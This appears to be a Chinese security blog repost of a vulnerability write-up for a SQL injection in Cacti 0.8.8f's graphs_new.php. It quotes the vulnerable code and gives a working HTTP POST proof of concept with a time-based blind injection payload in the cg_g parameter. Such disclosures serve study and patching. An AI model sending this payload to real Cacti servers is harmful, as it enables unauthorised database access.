最新消息:欢迎大家关注安全工具箱微信公众号,域名信息查询,微信搜索安全工具箱添加关注即可,或访问在线安全工具箱

Cacti 0.8.8f SQL注入漏洞

代码审计 表哥C 3156浏览 0评论

下载

漏洞分析

graphs_new.php

function form_save() {
    if (isset($_POST["save_component_graph"])) {
        /* summarize the 'create graph from host template/snmp index' stuff into an array */
        while (list($var, $val) = each($_POST)) {
            if (preg_match('/^cg_(\d+)$/', $var, $matches)) {
                $selected_graphs["cg"]{$matches[1]}{$matches[1]} = true;

            //cg_g is not filtered

            }elseif (preg_match('/^cg_g$/', $var)) {
                if ($_POST["cg_g"] > 0) {
                    $selected_graphs["cg"]{$_POST["cg_g"]}{$_POST["cg_g"]} = true;  //给数组赋值

                }
            }elseif (preg_match('/^sg_(\d+)_([a-f0-9]{32})$/', $var, $matches)) {
                $selected_graphs["sg"]{$matches[1]}{$_POST{"sgg_" . $matches[1]}}{$matches[2]} = true;
            }
        }

        if (isset($selected_graphs)) {
            host_new_graphs($_POST["host_id"], $_POST["host_template_id"], $selected_graphs);//调用漏洞函数
            exit;
        }

        header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);
    }

    if (isset($_POST["save_component_new_graphs"])) {
        host_new_graphs_save();

        header("Location: graphs_new.php?host_id=" . $_POST["host_id"]);
    }
}


function host_new_graphs($host_id, $host_template_id, $selected_graphs_array) {
    /* we use object buffering on this page to allow redirection to another page if no
    fields are actually drawn */
    ob_start();

    include_once("./include/top_header.php");

    print "<form method='post' action='graphs_new.php'>\n";

    $snmp_query_id = 0;
    $num_output_fields = array();

    while (list($form_type, $form_array) = each($selected_graphs_array)) {//便利数组
        while (list($form_id1, $form_array2) = each($form_array)) {//继续便利数组,将数组中的key提取出来作为form_id1,form_id2
            if ($form_type == "cg") {
                $graph_template_id = $form_id1; //赋值
                //sql injection in graph_template_id
                html_start_box("<strong>Create Graph from '" . db_fetch_cell("select name from graph_templates where id=$graph_template_id") . "'", "100%", "", "3", "center", "");//带入查询
            }elseif ($form_type == "sg") {
                while (list($form_id2, $form_array3) = each($form_array2)) {
                    /* ================= input validation ================= */
                    input_validate_input_number($snmp_query_id);
                    /* ==================================================== */

                    $snmp_query_id = $form_id1;
                    $snmp_query_graph_id = $form_id2;

POC

POC:

POST /cacti/graphs_new.php HTTP/1.1
Host: 192.168.217.133
Content-Type: application/x-www-form-urlencoded
Cookie: 1c4af7f2e90e3a789e67a8e3acd2372f=8a83va6ijomgf7qdgfpcl8l1p2; Cacti=j8chtc1ppq4n7viqkbah6c4tv2
Content-Length: 189

__csrf_magic=sid%3Aed226a87fdcc8e055d1c27b620e564d629d95e40%2C1450241184&cg_g=033926697+xor+(select(0)from(select sleep(5))v)&save_component_graph=1&host_id=2&host_template_id=0&action=save   

From:https://packetstormsecurity.com/files/135191/cacti088fgraphs-sql.txt

转载请注明:安全工具箱 » Cacti 0.8.8f SQL注入漏洞

发表我的评论
取消评论
表情

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

网友最新评论 (5)

  1. 88888
    888882年前 (2016-01-10)Reply
  2. 88888
    888882年前 (2016-01-10)Reply
  3. 贵站能否启用RSS功能,方便使用RSS阅读器的用户阅读文章。
    ZMOM10312年前 (2016-01-10)Reply
    • 默认是开启的 http://tools.pwn.ren/feed
      hacktools2年前 (2016-01-11)Reply
      • 没法抓取文章,感觉提供的xml格式有问题
        ZMOM10312年前 (2016-01-11)Reply